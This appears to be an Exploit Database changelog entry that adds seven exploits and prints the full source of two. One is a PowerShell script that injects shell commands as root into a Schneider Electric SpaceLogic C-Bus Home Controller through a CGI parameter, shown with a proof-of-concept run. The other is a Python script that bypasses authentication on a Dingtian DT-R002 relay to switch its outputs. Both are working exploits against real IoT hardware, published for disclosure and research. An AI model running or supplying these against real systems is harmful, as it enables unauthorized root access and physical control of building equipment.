DB: 2022-07-30

7 changes to exploits/shellcodes

Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
rpc.py 0.6.0 - Remote Code Execution (RCE)
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
Geonetwork 4.2.0 - XML External Entity (XXE)
Dingtian-DT-R002 3.1.276A - Authentication Bypass
Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)

Author: Offensive Security

exploits/hardware/remote/50987.ps1

@@ -0,0 +1,204 @@
+# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
+# Exploit Author: LiquidWorm
+
+<#SpaceLogic.ps1
+
+Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
+
+
+Vendor: Schneider Electric SE
+Product web page: https://www.se.com
+                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
+                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
+Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
+                  formerly known as C-Bus Wiser Home Controller MK2
+                  V1.31.460 and prior
+                  Firmware: 604
+
+Summary: SpaceLogic C-Bus Home Automation System
+Lighting control and automation solutions for
+buildings of the future, part of SpaceLogic.
+SpaceLogic C-Bus is a powerful, fully integrated
+system that can control and automate lighting
+and many other electrical systems and products.
+The SpaceLogic C-Bus system is robust, flexible,
+scalable and has proven solutions for buildings
+of the future. Implemented for commercial and
+residential buildings automation, it brings
+control, comfort, efficiency and ease of use
+to its occupants.
+
+Wiser Home Control makes technologies in your
+home easy by providing seamless control of music,
+home theatre, lighting, air conditioning, sprinkler
+systems, curtains and shutters, security systems...
+you name it. Usable anytime, anywhere even when
+you are away, via preset shortcuts or direct
+control, in the same look and feel from a wall
+switch, a home computer, or even your smartphone
+or TV - there is no wiser way to enjoy 24/7
+connectivity, comfort and convenience, entertainment
+and peace of mind homewide!
+
+The Wiser 2 Home Controller allows you to access
+your C-Bus using a graphical user interface, sometimes
+referred to as the Wiser 2 UI. The Wiser 2 Home
+Controller arrives with a sample project loaded
+and the user interface accessible from your local
+home network. With certain options set, you can
+also access the Wiser 2 UI from anywhere using
+the Internet. Using the Wiser 2 Home Controller
+you can: control equipment such as IP cameras,
+C-Bus devices and non C-Bus wired and wireless
+equipment on the home LAN, schedule events in
+the home, create and store scenes on-board, customise
+a C-Bus system using the on-board Logic Engine,
+monitor the home environment including C-Bus and
+security systems, control ZigBee products such
+as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
+
+Examples of equipment you might access with Wiser
+2 Home Controller include lighting, HVAC, curtains,
+cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
+multi-room audio and security controls.
+
+Desc: The home automation solution suffers from
+an authenticated OS command injection vulnerability.
+This can be exploited to inject and execute arbitrary
+shell commands as the root user via the 'name' GET
+parameter in 'delsnap.pl' Perl/CGI script which is
+used for deleting snapshots taken from the webcam.
+
+=========================================================
+/www/delsnap.pl:
+----------------
+
+01: #!/usr/bin/perl
+02: use IO::Handle;
+03:
+04:
+05: select(STDERR);
+06: $| = 1;
+07: select(STDOUT);
+08: $| = 1;
+09:
+10: #print "\r\n\r\n";
+11:
+12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
+13: use CGI;
+14:
+15: my $PROGNAME = "delsnap.pl";
+16:
+17: my $cgi = new CGI();
+18:
+19: my $name = $cgi->param('name');
+20: if ($name eq "list") {
+21:     print "\r\n\r\n";
+22:     print "DATA=";
+23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
+24:     exit(0);
+25: }
+26: if ($name eq "deleteall") {
+27:     print "\r\n\r\n";
+28:     print "DELETINGALL=TRUE&";
+29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
+30:     print "COMPLETED=true\n";
+31:     exit(0);
+32: }
+33: #print "name $name\n";
+34: print "\r\n\r\n";
+35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";
+36:
+37: unlink $filename or die "COMPLETED=false\n";
+38:
+39: print "COMPLETED=true\n";
+
+=========================================================
+
+Tested on: Machine: OMAP3 Wiser2 Board
+           CPU: ARMv7 revision 2
+           GNU/Linux 2.6.37 (armv7l)
+           BusyBox v1.22.1
+           thttpd/2.25b
+           Perl v5.20.0
+           Clipsal 81
+           Angstrom 2009.X-stable
+           PICED 4.14.0.100
+           lighttpd/1.7
+           GCC 4.4.3
+           NodeJS v10.15.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5710
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
+
+Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
+
+CVE ID: CVE-2022-34753
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753
+
+
+27.03.2022
+
+#>
+
+
+$host.UI.RawUI.ForegroundColor = "Green"
+if ($($args.Count) -ne 2)  {
+    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
+} else {
+    $ip = $args[0]
+    $cmd = $args[1]
+    $cmdinj = "/delsnap.pl?name=|$cmd"
+    Write-Host("`nSending command '$cmd' to $ip`n")
+    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
+    curl -v $ip$cmdinj
+}
+
+
+<#PoC
+
+PS C:\> .\SpaceLogic.ps1
+
+Usage: .\SpaceLogic.ps1 [IP] [CMD]
+
+
+PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"
+
+Sending command 'uname -a;id;pwd' to 192.168.1.2
+
+VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
+VERBOSE: received 129-byte response of content type text/html; charset=utf-8
+
+
+StatusCode        : 200
+StatusDescription : OK
+Content           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
+                    uid=0(root) gid=0(root)
+                    /custom-package
+
+RawContent        : HTTP/1.1 200 OK
+                    Access-Control-Allow-Origin: *
+                    Connection: keep-alive
+                    Content-Length: 129
+                    Content-Type: text/html; charset=utf-8
+                    Date: Thu, 30 Jun 2022 14:48:43 GMT
+                    ETag: W/"81-LTIWJvYlDBYAlgXEy...
+Forms             : {}
+Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;
+                    charset=utf-8]...}
+Images            : {}
+InputFields       : {}
+Links             : {}
+ParsedHtml        : mshtml.HTMLDocumentClass
+RawContentLength  : 129
+
+
+
+
+PS C:\>
+#>

exploits/hardware/webapps/50984.py

@@ -0,0 +1,92 @@
+# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
+# Google Dork: NA
+# Date: 13th July 2022
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
+# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
+# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
+# Version: V3.1.276A
+# Tested on: MAC OSX
+# CVE : CVE-2022-29593#!/usr/local/bin/python3
+# Author: Victor Hanna (SpiderLabs)
+# DingTian DT-R002 2CH Smart Relay
+# CWE-294 - Authentication Bypass by Capture-replay
+
+import requests
+import re
+import urllib.parse
+from colorama import init
+from colorama import Fore, Back, Style
+import sys
+import os
+import time
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def banner():
+    print ("[+]********************************************************************************[+]")
+    print ("|   Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t    |")
+    print ("|   Description: DingTian DT-R002 2CH Smart Relay                                      |")
+    print ("|   Usage : "+sys.argv[0]+" <host> <relay#>                                           |")
+    print ("[+]********************************************************************************[+]")
+
+def main():
+    os.system('clear')
+    banner()
+    urlRelay1On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
+    urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
+    urlRelay2On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
+    urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
+
+    headers = {
+        "Host": ""+host+"",
+        "User-Agent": "9lyph/3.0",
+        "Accept": "*/*",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate",
+        "DNT": "1",
+        "Connection": "close",
+        "Referer": "http://"+host+"/relay_cgi.html",
+        "Cookie": "session=4463009"
+    }
+
+    print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
+    for i in range(5):
+        time.sleep (1)
+        print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
+    try:
+        if (relay == "1"):
+            print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay1On)
+            time.sleep (5)
+            print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
+            r = requests.get(urlRelay1Off)
+            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
+        elif (relay == "2"):
+            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay2On)
+            time.sleep (5)
+            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay2Off)
+            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
+        else:
+            print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
+    except KeyboardInterrupt:
+        sys.exit(1)
+    except requests.exceptions.Timeout:
+        print ("[!] Connection to host timed out !")
+        sys.exit(1)
+    except requests.exceptions.Timeout:
+        print ("[!] Connection to host timed out !")
+        sys.exit(1)
+    except Exception as e:
+        print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    if len(sys.argv)>2:
+        host = sys.argv[1]
+        relay = sys.argv[2]
+        main ()
+    else:
+        print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)